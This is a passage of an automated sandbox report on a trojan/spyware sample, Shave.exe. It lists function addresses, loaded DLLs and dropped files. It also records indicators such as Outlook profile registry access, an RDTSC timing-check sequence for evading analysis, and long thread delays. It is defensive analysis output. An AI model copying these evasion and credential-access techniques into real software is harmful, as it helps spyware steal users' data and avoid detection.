Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B39171 3_2_04B39171
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3E77F 3_2_04B3E77F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30960 3_2_04B30960
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A968 3_2_04B3A968
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C150 3_2_04B3C150
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B30950 3_2_04B30950
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33B58 3_2_04B33B58
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3A958 3_2_04B3A958
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B3C142 3_2_04B3C142
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B36B40 3_2_04B36B40
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B35B48 3_2_04B35B48
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B33B4E 3_2_04B33B4E
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B570C0 3_2_04B570C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B5D710 3_2_04B5D710
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B554A0 3_2_04B554A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B522A0 3_2_04B522A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53880 3_2_04B53880
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50680 3_2_04B50680
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56A80 3_2_04B56A80
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B55AE0 3_2_04B55AE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B528E0 3_2_04B528E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53EC0 3_2_04B53EC0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50CC0 3_2_04B50CC0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50036 3_2_04B50036
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54820 3_2_04B54820
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51620 3_2_04B51620
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B55E00 3_2_04B55E00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B52C00 3_2_04B52C00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54E60 3_2_04B54E60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51C60 3_2_04B51C60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56440 3_2_04B56440
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53240 3_2_04B53240
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50040 3_2_04B50040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B5EE48 3_2_04B5EE48
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56DA0 3_2_04B56DA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53BA0 3_2_04B53BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B509A0 3_2_04B509A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B55180 3_2_04B55180
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51F80 3_2_04B51F80
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B541E0 3_2_04B541E0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50FE0 3_2_04B50FE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B541D0 3_2_04B541D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B557C0 3_2_04B557C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B525C0 3_2_04B525C0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B599C8 3_2_04B599C8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56120 3_2_04B56120
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B52F20 3_2_04B52F20
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54500 3_2_04B54500
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51300 3_2_04B51300
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56760 3_2_04B56760
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B53560 3_2_04B53560
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50360 3_2_04B50360
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B50350 3_2_04B50350
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B56750 3_2_04B56750
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B54B40 3_2_04B54B40
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B51940 3_2_04B51940
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04B59740 3_2_04B59740
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41CF0 3_2_04E41CF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48470 3_2_04E48470
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4FB30 3_2_04E4FB30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41CE0 3_2_04E41CE0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4F4F0 3_2_04E4F4F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E490F0 3_2_04E490F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4C2F0 3_2_04E4C2F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E404FA 3_2_04E404FA
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4D8D0 3_2_04E4D8D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A6D0 3_2_04E4A6D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4BCB0 3_2_04E4BCB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48AB0 3_2_04E48AB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4EEB0 3_2_04E4EEB0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40E8B 3_2_04E40E8B
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A090 3_2_04E4A090
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4D290 3_2_04E4D290
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40E98 3_2_04E40E98
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4E870 3_2_04E4E870
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B670 3_2_04E4B670
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A07F 3_2_04E4A07F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40040 3_2_04E40040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4CC41 3_2_04E4CC41
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49A50 3_2_04E49A50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4CC50 3_2_04E4CC50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41828 3_2_04E41828
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B030 3_2_04E4B030
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4E230 3_2_04E4E230
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41817 3_2_04E41817
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4C610 3_2_04E4C610
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49410 3_2_04E49410
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4F810 3_2_04E4F810
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4001A 3_2_04E4001A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4DBF0 3_2_04E4DBF0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A9F0 3_2_04E4A9F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4F1D0 3_2_04E4F1D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E409D0 3_2_04E409D0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48DD0 3_2_04E48DD0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4BFD0 3_2_04E4BFD0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4D5B0 3_2_04E4D5B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4A3B0 3_2_04E4A3B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E409BF 3_2_04E409BF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B990 3_2_04E4B990
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E48790 3_2_04E48790
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4EB90 3_2_04E4EB90
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41360 3_2_04E41360
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E43360 3_2_04E43360
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49D70 3_2_04E49D70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4CF70 3_2_04E4CF70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4E550 3_2_04E4E550
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4B350 3_2_04E4B350
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E41351 3_2_04E41351
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4C930 3_2_04E4C930
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E49730 3_2_04E49730
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E40508 3_2_04E40508
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4AD10 3_2_04E4AD10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_04E4DF10 3_2_04E4DF10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0D88 3_2_379F0D88
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F5CB6 3_2_379F5CB6
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F3FB2 3_2_379F3FB2
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F36F0 3_2_379F36F0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F3008 3_2_379F3008
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2238 3_2_379F2238
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2920 3_2_379F2920
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1B50 3_2_379F1B50
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1470 3_2_379F1470
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2FF8 3_2_379F2FF8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F36E1 3_2_379F36E1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2911 3_2_379F2911
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0A10 3_2_379F0A10
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0006 3_2_379F0006
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0A01 3_2_379F0A01
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1B3F 3_2_379F1B3F
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F2229 3_2_379F2229
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0040 3_2_379F0040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F0D78 3_2_379F0D78
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_379F1460 3_2_379F1460
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38315028 3_2_38315028
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831FC68 3_2_3831FC68
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38312968 3_2_38312968
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D9A8 3_2_3831D9A8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831DE00 3_2_3831DE00
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38311E80 3_2_38311E80
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38319328 3_2_38319328
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_383117A0 3_2_383117A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38315020 3_2_38315020
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831F810 3_2_3831F810
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310012 3_2_38310012
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38319C18 3_2_38319C18
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310040 3_2_38310040
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831CCA0 3_2_3831CCA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D0F8 3_2_3831D0F8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D550 3_2_3831D550
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38319548 3_2_38319548
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831D999 3_2_3831D999
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831DDF1 3_2_3831DDF1
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831DDFF 3_2_3831DDFF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38311E70 3_2_38311E70
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E257 3_2_3831E257
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E258 3_2_3831E258
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E24A 3_2_3831E24A
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E6B0 3_2_3831E6B0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E6A0 3_2_3831E6A0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831E6AF 3_2_3831E6AF
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310B30 3_2_38310B30
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38310B20 3_2_38310B20
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831EB08 3_2_3831EB08
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831EF60 3_2_3831EF60
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831EF51 3_2_3831EF51
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831F3B8 3_2_3831F3B8
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38318BA0 3_2_38318BA0
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831C3AE 3_2_3831C3AE
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_38318B91 3_2_38318B91
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_3831178F 3_2_3831178F
Source: C:\Users\user\Desktop\Shave.exe Code function: String function: 00402C41 appears 46 times
Source: Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Shave.exe
Source: Shave.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/5@7/5
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046FF
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_00402104 CoCreateInstance, 0_2_00402104
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Users\user\AppData\Local\Temp\nsv5BEB.tmp Jump to behavior
Source: Shave.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Shave.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Shave.exe Virustotal: Detection: 45%
Source: C:\Users\user\Desktop\Shave.exe File read: C:\Users\user\Desktop\Shave.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
Source: C:\Users\user\Desktop\Shave.exe Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe"
Source: C:\Users\user\Desktop\Shave.exe Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe" Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Shave.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2342825551.0000000004332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2342460807.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Shave.exe PID: 1216, type: MEMORYSTR
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F971B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F971B63
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F972FD0 push eax; ret 0_2_6F972FFE
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_004020ED push E9004081h; iretd 3_2_004020F2
Source: C:\Users\user\Desktop\Shave.exe Code function: 3_2_00159C30 push esp; retf 0017h 3_2_00159D55
Source: C:\Users\user\Desktop\Shave.exe File created: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Shave.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Shave.exe API/Special instruction interceptor: Address: 452F7F5
Source: C:\Users\user\Desktop\Shave.exe API/Special instruction interceptor: Address: 319F7F5
Source: C:\Users\user\Desktop\Shave.exe RDTSC instruction interceptor: First address: 44D072A second address: 44D072A instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 test edi, 02340520h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007FEFB8FB9C9Eh 0x0000000e test dl, cl 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 test ebx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Shave.exe RDTSC instruction interceptor: First address: 314072A second address: 314072A instructions: 0x00000000 rdtsc 0x00000002 test dl, cl 0x00000004 test edi, 02340520h 0x0000000a cmp ebx, ecx 0x0000000c jc 00007FEFB8F000DEh 0x0000000e test dl, cl 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 test ebx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: 35130000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: 34F10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598391 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 598063 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Thread delayed: delay time: 597047 Jump to behavior
